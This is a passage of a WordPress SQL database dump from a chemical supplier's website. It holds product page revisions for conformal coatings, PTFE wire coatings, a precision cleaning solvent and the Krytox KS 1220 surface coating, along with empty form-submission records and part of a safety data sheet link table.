removal.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/silicone-confromal-coating/"><strong>SILICONE:</strong></a> Silicone conformal coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/urethane-conformal-coating/"><strong>URETHANE:</strong></a> Polyurethane conformal coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like <a href="https://www.miller-stephenson.com/product/conformal-coating-stripper/">MS-114</a> Conformal Coating Stripper.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/ms-252n/"><strong>VARNISH:</strong></a> Varnish conformal coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\r\n</ul>\r\nEqually as important as choosing the correct resin is proper application and cure of the conformal coating.  To be effective, a conformal coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edge to generate a ubiquitous layer throughout the entire board or device\r\n<h4><strong><img class="alignleft wp-image-2477" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg" alt="conformal coating" width="343" height="343" />Applying Conformal Coatings:</strong></h4>\r\nThe effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the three main ways of applying a conformal coating:\r\n<ol>\r\n 	<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\r\n 	<li>Selective robotic coating – such as <a href="http://www.nordson.com/en/divisions/asymtek">Asymtek</a>. All coating types can be used if the correct dispense head is selected</li>\r\n 	<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\r\n</ol>\r\nThe liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular leveling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB. Cleanliness of the substrate is of extreme importance for the successful application of a coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures.\r\n\r\n<strong>Miller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:</strong>\r\n<ul>\r\n 	<li>Simple application- Convenient aerosol or bulk</li>\r\n 	<li>Specialized formulas to provide uniform, thin films</li>\r\n 	<li>Easy removal, repair and replacement</li>\r\n 	<li>100% non-flammable; low odor formulations</li>\r\n 	<li>Superior Protection against thermal and mechanical shock</li>\r\n 	<li>MIL-Spec and Commerical-Spec polymer coatings</li>\r\n</ul>\r\n[ux_product_categories ids="29,28,27,30" number="10"]\r\n\r\nThese products can also be found on Ellsworth <a href="https://www.ellsworth.com/products/conformal-coatings/polyurethane/miller-stephenson-ms-470c-urethane-conformal-coating-clear-14-oz-aerosol/">here.</a>', 'Choosing the Right Conformal Coating', '', 'inherit', 'closed', 'closed', '', '2474-revision-v1', '', '', '2017-04-10 18:20:03', '2017-04-10 18:20:03', '', 2474, 'https://www.miller-stephenson.com/2474-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4016, 0, '2017-04-10 19:45:34', '2017-04-10 19:45:34', '', '', '', 'publish', 'closed', 'closed', '', '4016', '', '', '2017-04-10 19:45:35', '2017-04-10 19:45:35', '', 0, 'https://www.miller-stephenson.com/nf_sub/4016/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4017, 0, '2017-04-10 21:05:26', '2017-04-10 21:05:26', '', '', '', 'publish', 'closed', 'closed', '', '4017', '', '', '2017-04-10 21:05:26', '2017-04-10 21:05:26', '', 0, 'https://www.miller-stephenson.com/nf_sub/4017/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4018, 0, '2017-04-11 13:31:33', '2017-04-11 13:31:33', '', '', '', 'publish', 'closed', 'closed', '', '4018', '', '', '2017-04-11 13:31:34', '2017-04-11 13:31:34', '', 0, 'https://www.miller-stephenson.com/nf_sub/4018/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4019, 0, '2017-04-11 20:34:03', '2017-04-11 20:34:03', '', '', '', 'publish', 'closed', 'closed', '', '4019', '', '', '2017-04-11 20:34:04', '2017-04-11 20:34:04', '', 0, 'https://www.miller-stephenson.com/nf_sub/4019/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4020, 651, '2017-04-12 14:37:50', '2017-04-12 14:37:50', '', '', '', 'publish', 'closed', 'closed', '', '4020', '', '', '2017-04-12 14:37:50', '2017-04-12 14:37:50', '', 0, 'https://www.miller-stephenson.com/nf_sub/4020/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4021, 0, '2017-04-12 20:27:30', '2017-04-12 20:27:30', '', '', '', 'publish', 'closed', 'closed', '', '4021', '', '', '2017-04-12 20:27:31', '2017-04-12 20:27:31', '', 0, 'https://www.miller-stephenson.com/nf_sub/4021/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4022, 0, '2017-04-13 11:48:37', '2017-04-13 11:48:37', '', '', '', 'publish', 'closed', 'closed', '', '4022', '', '', '2017-04-13 11:48:37', '2017-04-13 11:48:37', '', 0, 'https://www.miller-stephenson.com/nf_sub/4022/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4023, 0, '2017-04-13 13:49:00', '2017-04-13 13:49:00', '', '', '', 'publish', 'closed', 'closed', '', '4023', '', '', '2017-04-13 13:49:00', '2017-04-13 13:49:00', '', 0, 'https://www.miller-stephenson.com/nf_sub/4023/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4024, 0, '2017-04-13 15:38:10', '2017-04-13 15:38:10', '', '', '', 'publish', 'closed', 'closed', '', '4024', '', '', '2017-04-13 15:38:10', '2017-04-13 15:38:10', '', 0, 'https://www.miller-stephenson.com/nf_sub/4024/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4025, 3, '2017-04-13 16:12:07', '2017-04-13 16:12:07', '', 'ms-752u', '', 'inherit', 'closed', 'closed', '', 'ms-752u-4', '', '', '2017-04-13 16:12:07', '2017-04-13 16:12:07', '', 1834, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-752U.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (4026, 3, '2017-04-13 16:13:35', '2017-04-13 16:13:35', '', 'MS-752U', 'Miller-Stephenson offers an Ultrapure grade its most robust cleaning agent.  This solvent blend has been purified through a proprietary filtration and distillation process achieving sub ppm levels of particulates and non-volatile residues. MS-752U is a potent, precision cleaning agent used in variety of clean room operations or as a final rinse of parts in oxygen service. This product also can be used for precision and specialty applications in many industries such as Electronics, Military, Aerospace, Communications, and Clean rooms. It is ideally suited for removing mineral oil, vacuum oil, wax, heavy grease, cutting oil, stamping oil, hydraulic oil, gear oil, or as a final rinse.  Benefits include:\r\n<ul>\r\n 	<li>Sub ppm contaminate and particle levels</li>\r\n 	<li>Evaporates quickly; 100% non-flammable</li>\r\n 	<li>High cleaning efficiency (Kb value)</li>\r\n 	<li>Approved by major aerospace and gas manufactures</li>\r\n 	<li>Non-ozone depleting; RoHS compliant</li>\r\n</ul>', 'inherit', 'closed', 'closed', '', '1834-autosave-v1', '', '', '2017-04-13 16:13:35', '2017-04-13 16:13:35', '', 1834, 'https://www.miller-stephenson.com/1834-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4027, 0, '2017-04-13 17:37:11', '2017-04-13 17:37:11', '', '', '', 'publish', 'closed', 'closed', '', '4027', '', '', '2017-04-13 17:37:11', '2017-04-13 17:37:11', '', 0, 'https://www.miller-stephenson.com/nf_sub/4027/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4028, 0, '2017-04-13 17:39:57', '2017-04-13 17:39:57', '', '', '', 'publish', 'closed', 'closed', '', '4028', '', '', '2017-04-13 17:39:58', '2017-04-13 17:39:58', '', 0, 'https://www.miller-stephenson.com/nf_sub/4028/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4029, 0, '2017-04-13 18:55:32', '2017-04-13 18:55:32', '', '', '', 'publish', 'closed', 'closed', '', '4029', '', '', '2017-04-13 18:55:32', '2017-04-13 18:55:32', '', 0, 'https://www.miller-stephenson.com/nf_sub/4029/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4030, 0, '2017-04-13 21:16:45', '2017-04-13 21:16:45', '', '', '', 'publish', 'closed', 'closed', '', '4030', '', '', '2017-04-13 21:16:45', '2017-04-13 21:16:45', '', 0, 'https://www.miller-stephenson.com/nf_sub/4030/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4031, 0, '2017-04-14 14:14:13', '2017-04-14 14:14:13', '', '', '', 'publish', 'closed', 'closed', '', '4031', '', '', '2017-04-14 14:14:14', '2017-04-14 14:14:14', '', 0, 'https://www.miller-stephenson.com/nf_sub/4031/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4032, 0, '2017-04-14 16:41:43', '2017-04-14 16:41:43', '', '', '', 'publish', 'closed', 'closed', '', '4032', '', '', '2017-04-14 16:41:43', '2017-04-14 16:41:43', '', 0, 'https://www.miller-stephenson.com/nf_sub/4032/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4033, 2, '2017-04-17 14:37:27', '2017-04-17 14:37:27', '<h2><strong>Insulator &amp; Conductor Coating Introduction</strong></h2>\nShieldSys 520 Insulator &amp; Conductor Coating is a PTFE wire coating designed to provide unmatched lubricity and anti-stick properties to all wires and cables. ShieldSys 520 wire coating is water and isopropyl alcohol based dispersion.  When applied to to a wire or cable, it exhibits outstanding adhesion, durability, and a very low coefficient of friction. This coating is particular effectively at enabling easy jacket stripping due to its high lubricity and non-stick properties. ShieldSys 520 is proprietary PTFE wire coating formulation providing accelerated drying and cure times relative to ShieldSys 815. Moreover ShieldSys 520 can be used as a electrical conductor coating.\n<h4><strong>Advantages of Insulator &amp; Conductor Coating:</strong></h4>\nShieldSys 520 exhibit outstanding lubricity and extremely low coefficient of friction. The patented polymer is thermally stable and can be used at temperatures up to 300°C (572°F). The polymer is clean, non-migrating, chemically inert, and not gummy or oily.\n<h4><strong>Wire Drawing Lubricant:</strong></h4>\nShieldSys 520 PTFE wire coating is a high performance PTFE dispersions which extremely stable dry lubricants that form a film on the wire surface for drawing. The product can also be used as a pre-coat to enhance the total performance of your drawing lubricant systems. Die wear is minimized, and faster speeds can be obtained.\n<h4><strong>Coating and Wire Stripping:</strong></h4>\nDue to ShieldSys\' unique properties they are the ideal coatings for enhancing lubricity and antistick properties on conductor or insulated wire and cable. DryFilm dispersions are used to impart a thin nonstick film on metal wires as well as on insulated wire and cable products and twisted wire in jackets. Applications include: reduce insulation stripping force, provide nonstick (abrasion resistance) to twisted wire, and a lubricant for welding wire, wire forming, and knitting.\n<h4><strong>Processing Details:</strong></h4>\nThe application of ShieldSys DryFilm products fits easily into most wire production facilities. The wire can be run through a dispersion bath containing one our PTFE wire coatings. Alternately, conventional spraying equipment can be used to coat the wire. A heating or drying step is recommended to ensure the carrier has evaporated prior to insulation or spooling. Alternately, quick drying can be achieved by using the solvent-based products that use isopropyl alcohol.', 'ShieldSys 520 Insulator & Conductor Coating', '', 'inherit', 'closed', 'closed', '', '3989-autosave-v1', '', '', '2017-04-17 14:37:27', '2017-04-17 14:37:27', '', 3989, 'https://www.miller-stephenson.com/3989-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4034, 2, '2017-04-17 14:35:49', '2017-04-17 14:35:49', '<h2><strong>DryFilm Industrial Coating Introduction</strong></h2>\nShieldSys™ 815 Dryfilm Industrial Coating is a water-based, PTFE coating system providing unmatched utility as a wire and cable lubricant.  Our products generate a thin, dry, and lubricious film on metal wires, insulated wires, and twisted wire in jackets. Our proprietary chemistry yields superior surface adhesion and durability resulting in minimal migration of the lubricant and prolonged application effectiveness. The unique properties of ShieldSys™ 815 DryFilm industrial coating makes them ideal for application that require enhanced lubricity and antistick properties on conductor or insulated wire and cable. DryFilm lubrication products reduce insulation stripping force and provide nonstick abrasion resistance to twisted wire and lubricity for welding wire, wire forming, and knitting without the use of standard "wet lubricants" like greases and oils. Our patented <a href="https://en.wikipedia.org/wiki/Polytetrafluoroethylene">PTFE</a>-based formulation is thermally stable and can be used at temperatures up to 300°C (581°F). The polymer is clean non-migrating, chemically inert, and not gummy or oily. Moreover ShieldSys™ 815 can be used as an excellent electrical insulator coating.\n<h4><strong>Wire Drawing Lubrication Benefits: </strong></h4>\nShieldSys™ 815 DryFilm Industrial Coating are extremely stable dry lubrication products that form a film on the wire surface for drawing. The product can also be used as a pre-coat to enhance the total performance of your drawing lubrication products. One to two die-pass systems are recommended. As a Wire and Cable Lubricant, applicator will observe superior surface adhesion and a dramatic reduction in coefficient of friction.\n<h4><strong>Wire and Cable Coating and Stripping:</strong></h4>\nThe unique properties of our wire and cable lubrication products makes them ideal in coatings that enhance lubricity and antistick properties on conductor or insulated wire and cable. DryFilm lubrication products reduce insulation stripping force and provide nonstick abrasion resistance to twisted wire and lubricity for welding wire, wire forming, and knitting. ShieldSys™ 815 are used to impart a thin, nonstick film on metal wires or on insulated wire for cable products and twisted wire in jackets.', 'ShieldSys™ 815 DryFilm Industrial Coating', 'ShieldSys 815 Dryfilm Industrial Coating is a water-based, PTFE coating system providing unmatched utility as a wire and cable lubricant, coating and insulator. Our product generates a thin, dry, and lubricious film on metal wires, insulated wires, and twisted wire in jackets. ShieldSys 815 utilizes proprietary chemistry yielding superior surface adhesion and durability resulting in minimal migration of the lubricant and prolonged application effectiveness. Benefits include:\n<ul>\n 	<li>Water-based formulation</li>\n 	<li>Superior surface adhesion and durability</li>\n 	<li>Anti-stick; low coefficient of friction</li>\n 	<li>Low VOC; Low Odor</li>\n 	<li>Fast Dry and Cure Times</li>\n</ul>', 'inherit', 'closed', 'closed', '', '3985-autosave-v1', '', '', '2017-04-17 14:35:49', '2017-04-17 14:35:49', '', 3985, 'https://www.miller-stephenson.com/3985-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4035, 0, '2017-04-17 21:24:16', '2017-04-17 21:24:16', '', '', '', 'publish', 'closed', 'closed', '', '4035', '', '', '2017-04-17 21:24:16', '2017-04-17 21:24:16', '', 0, 'https://www.miller-stephenson.com/nf_sub/4035/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4036, 0, '2017-04-17 21:26:59', '2017-04-17 21:26:59', '', '', '', 'publish', 'closed', 'closed', '', '4036', '', '', '2017-04-17 21:27:00', '2017-04-17 21:27:00', '', 0, 'https://www.miller-stephenson.com/nf_sub/4036/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4037, 0, '2017-04-18 10:07:50', '2017-04-18 10:07:50', '', '', '', 'publish', 'closed', 'closed', '', '4037', '', '', '2017-04-18 10:07:50', '2017-04-18 10:07:50', '', 0, 'https://www.miller-stephenson.com/nf_sub/4037/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4038, 107, '2017-04-18 12:55:08', '2017-04-18 12:55:08', '', '', '', 'publish', 'closed', 'closed', '', '4038', '', '', '2017-04-18 12:55:08', '2017-04-18 12:55:08', '', 0, 'https://www.miller-stephenson.com/nf_sub/4038/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4039, 0, '2017-04-18 14:25:23', '2017-04-18 14:25:23', '', '', '', 'publish', 'closed', 'closed', '', '4039', '', '', '2017-04-18 14:25:24', '2017-04-18 14:25:24', '', 0, 'https://www.miller-stephenson.com/nf_sub/4039/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4040, 0, '2017-04-18 14:57:45', '2017-04-18 14:57:45', '', '', '', 'publish', 'closed', 'closed', '', '4040', '', '', '2017-04-18 14:57:45', '2017-04-18 14:57:45', '', 0, 'https://www.miller-stephenson.com/nf_sub/4040/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4042, 2, '2017-04-18 17:41:06', '2017-04-18 17:41:06', '<h2><strong>Krytox KS 1220 | Functional Polymer | Anti-Smudge | Anti-Fouling | Coating</strong></h2>\nKrytox KS 1220 functional polymer is an innovative perfluoropolyether (PFPE) alkoxysilane developed by Chemours. It takes advantage of the technology behind Krytox performance lubricants to impart anti-smudge, antifouling, and easy-clean properties to a variety of surfaces. The unique chemical structure of Krytox KS 1220 provides treated substrates with excellent oil and water repellency, as well as low coefficient of friction. As a result, surfaces treated with Krytox KS 1220 exhibit a smooth feel and are scratch-resistant. Krytox KS 1220 is an ideal easy-clean coating solution for maintaining the appearance and integrity of highly manipulated surfaces, such as touch panel displays, cover glass, optical lenses, and metal casings.\n<h3><span style="font-size: 80%;"><strong>Properties</strong></span></h3>\n<ul>\n 	<li><span style="font-size: 100%;">Hydrophobic and oleophobic</span></li>\n 	<li><span style="font-size: 100%;">Abrasion resistance</span></li>\n 	<li><span style="font-size: 100%;">Low coefficient of friction</span></li>\n 	<li><span style="font-size: 100%;">Chemically stable in non-alkali cleaners</span></li>\n 	<li><span style="font-size: 100%;">Durable and transparent</span></li>\n 	<li><span style="font-size: 100%;">Thermal and UV resistance</span></li>\n</ul>\n<h3><span style="font-size: 80%;"><strong>Application Methods</strong></span></h3>\nKrytox KS 1220 functional polymer can be applied by dip coating, spray, or physical vapor deposition (PVD) methods. In general, spray coating is recommended, because it allows the coating procedure to be amenable for a continuous process. The thermal stability of Krytox KS 1220, and its ability to moisture cure, permits a wide range of curing conditions.\n<h3><span style="font-size: 80%;"><strong>Preparing a Surface</strong></span></h3>\nAn activated surface with reactive, ideally hydroxyl, functionality is necessary for Krytox KS 1220 to chemically bind to the substrate. Therefore, thorough cleaning and activation of the surface to be coated is critical for the proper performance of Krytox KS 1220. Without proper cleaning, surface contamination may impede chemical binding and negatively impact the product’s performance. When necessary, plasma or ion-discharge treatment may be used to activate the surface and enhance the bonding between Krytox KS 1220 and the substrate. Alternatively, chemical and/or physical methods may be necessary, depending on\nthe application.\n<h3><img class="size-full wp-image-2461 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/KS-1220-Treatment.jpg" alt="ks-1220-treatment" width="269" height="452" /><span style="font-size: 80%;"><strong>Coating a Surface</strong></span></h3>\nKrytox KS 1220 functional polymer is typically prepared by diluting the product to 0.1–0.5% by weight with solvents having a boiling range of 50–110 °C (122–230 °F). Solvents suitable for use with KS 1220 include fluorinated fluids, such as Vertrel XF and Vertrel Suprion from Miller-Stephenson. This coating can be applied by dip coating, spraying, or vapor deposition methods.\n<h3><span style="font-size: 80%;"><strong>Curing</strong></span></h3>\nFor optimum surface treatment, KS 1220 functional polymer must chemically bind to the substrate surface through a proper curing process. Thermal curing at 100–150 °C (212–302 °F) for 30–60 min is recommended for most applications. However, temperature and cure times may be varied to achieve optimal performance. Using a lower temperature and longer cure time can be helpful to achieve optimal performance for materials with lower thermal tolerance. Water is required to cure Krytox KS 1220. If surface moisture is not present, a humidity-controlled environment around 50–90% RH should be utilized.\n<h3><span style="font-size: 80%;"><strong>Post-Cure Process</strong></span></h3>\nDepending on the coating method, residual material may be visible on the coated surface. Simply wipe the surface with a lint-free, microfiber cloth until visually clear. Covering the surface with a protective film is recommended for proper storage.\n<h3><span style="font-size: 80%;"><strong>Characteristics of Krytox KS 1220</strong></span></h3>\n<table width="662">\n<tbody>\n<tr>\n<td width="250"></td>\n<td style="text-align: center;" width="206"><strong>Unit</strong></td>\n<td style="text-align: center;" width="206"><strong>Krytox KS 1220</strong></td>\n</tr>\n<tr>\n<td>Appearance</td>\n<td></td>\n<td style="text-align: center;">Clear Liquid</td>\n</tr>\n<tr>\n<td>Contentration1</td>\n<td style="text-align: center;">%</td>\n<td style="text-align: center;">20</td>\n</tr>\n<tr>\n<td>Solvent Boiling Point</td>\n<td style="text-align: center;">°C</td>\n<td style="text-align: center;">55</td>\n</tr>\n<tr>\n<td>pH</td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;">Neutral</td>\n</tr>\n<tr>\n<td>Specific Gravity2</td>\n<td style="text-align: center;">g/cm^-3</td>\n<td style="text-align: center;">1.6</td>\n</tr>\n<tr>\n<td>Solvent Vapor Pressure</td>\n<td style="text-align: center;">hPa</td>\n<td style="text-align: center;" width="206">248 at 20 °C (68 °F)\n313 at 25 °C (77 °F)\n854 at 50 °C (122 °F)</td>\n</tr>\n</tbody>\n</table>\n<h3><span style="font-size: 80%;"><strong>Handling Instructions</strong></span></h3>\nPlease refer to the Safety Data Sheet (SDS) prior to using and handling Krytox KS 1220 functional polymer. When handling Krytox KS 1220, work in a well-ventilated area to avoid inhalation hazards. Wear safety glasses and nitrile gloves to avoid unintended exposure. Krytox KS 1220 is moisture-sensitive; therefore, appropriate methods should be used to ensure the sustained reactivity of the material. If an open bottle is to be reused, re-introducing a nitrogen blanket and refrigeration will prolong the shelf life.\n<h3><span style="font-size: 80%;"><strong>Packaging</strong></span></h3>\nKytox KS 1220 functional polymer is offered as a 20% solution in Vertrel XF fluorosolvent and available in either 100- or 500-g (0.22- or 1.1-lb) amber glass bottles. The product is packaged under nitrogen, and refrigerated storage is recommended.\n\n<img class="alignnone wp-image-2462" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/ks-1220-beads-800x309.jpg" alt="ks-1220-beads" width="652" height="252" />\n\n<a href="https://www.miller-stephenson.com/krytox-product-selection-guide/">To learn more about which Krytox product is right for you, please click here.</a>\n\n<a href="https://www.miller-stephenson.com/krytox-faq/">Krytox Frequently Asked Questions (FAQ)</a>', 'KS 1220', 'Krytox KS 1220 functional polymer is an innovative perfluoropolyether (PFPE) alkoxysilane developed by Chemours.\n\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '2460-autosave-v1', '', '', '2017-04-18 17:41:06', '2017-04-18 17:41:06', '', 2460, 'https://www.miller-stephenson.com/2460-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4043, 0, '2017-04-18 23:43:28', '2017-04-18 23:43:28', '', '', '', 'publish', 'closed', 'closed', '', '4043', '', '', '2017-04-18 23:43:28', '2017-04-18 23:43:28', '', 0, 'https://www.miller-stephenson.com/nf_sub/4043/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4044, 0, '2017-04-19 09:18:44', '2017-04-19 09:18:44', '', '', '', 'publish', 'closed', 'closed', '', '4044', '', '', '2017-04-19 09:18:45', '2017-04-19 09:18:45', '', 0, 'https://www.miller-stephenson.com/nf_sub/4044/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4045, 0, '2017-04-19 10:40:44', '2017-04-19 10:40:44', '', '', '', 'publish', 'closed', 'closed', '', '4045', '', '', '2017-04-19 10:40:45', '2017-04-19 10:40:45', '', 0, 'https://www.miller-stephenson.com/nf_sub/4045/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4046, 0, '2017-04-19 12:38:07', '2017-04-19 12:38:07', '', '', '', 'publish', 'closed', 'closed', '', '4046', '', '', '2017-04-19 12:38:07', '2017-04-19 12:38:07', '', 0, 'https://www.miller-stephenson.com/nf_sub/4046/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4048, 2, '2017-04-19 15:50:38', '2017-04-19 15:50:38', '', '242l-as-17', '', 'inherit', 'closed', 'closed', '', '242l-as-17', '', '', '2017-04-19 15:50:38', '2017-04-19 15:50:38', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2017/04/242L-AS-17.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (4049, 2, '2017-04-19 15:51:10', '2017-04-19 15:51:10', '<h1>Miller-Stephenson SDS database.</h1>\r\nIf you are unable to locate the specific SDS you need, please contact our Technical Support at support@mschem.com or 203-743-4447 (8-4 E.T.)\r\n<table width="1119">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="219"><strong>Aerosol</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Liquid</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Release Agents</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Conformal Coatings</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Krytox</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Epoxy</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/124H.pdf">MS-124H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/111.pdf">MS-111</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122AD.pdf">MS-122AD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/452N.pdf">MS-452N</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AGL683.pdf">AGL 683</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/900.pdf">MS-900</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222L.pdf">MS-222L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/114C.pdf">MS-114C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122ADRED.pdf">MS-122AD RED</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/460H.pdf">MS-460H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AT.pdf">AT</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/905A.pdf">MS-905 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222N.pdf">MS-222N</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/115.pdf">MS-115</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122ADL.pdf">MS-122ADL</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/462H.pdf">MS-462H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/ATA.pdf">ATA</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/905B.pdf">MS-905 Part B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222N.pdf">MS-222T</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/182SD.pdf">MS-182SD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122AV.pdf">MS-122AV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/465C.pdf">MS-465C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT2A45.pdf">AUT 2A45</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/907A.pdf">MS-907 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222N.pdf">MS-222F</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/126H.pdf">MS-126H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122E.pdf">MS-122E</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/467C.pdf">MS-467C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT523.pdf">AUT 523</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/907B.pdf">MS-907 Part B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/242L.pdf">MS-242L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/126HUV.pdf">MS-126HUV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122ERED.pdf">MS-122E RED</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/470C-16.pdf">MS-470C</a></td>\r\n<td style="text-align: center;"><a 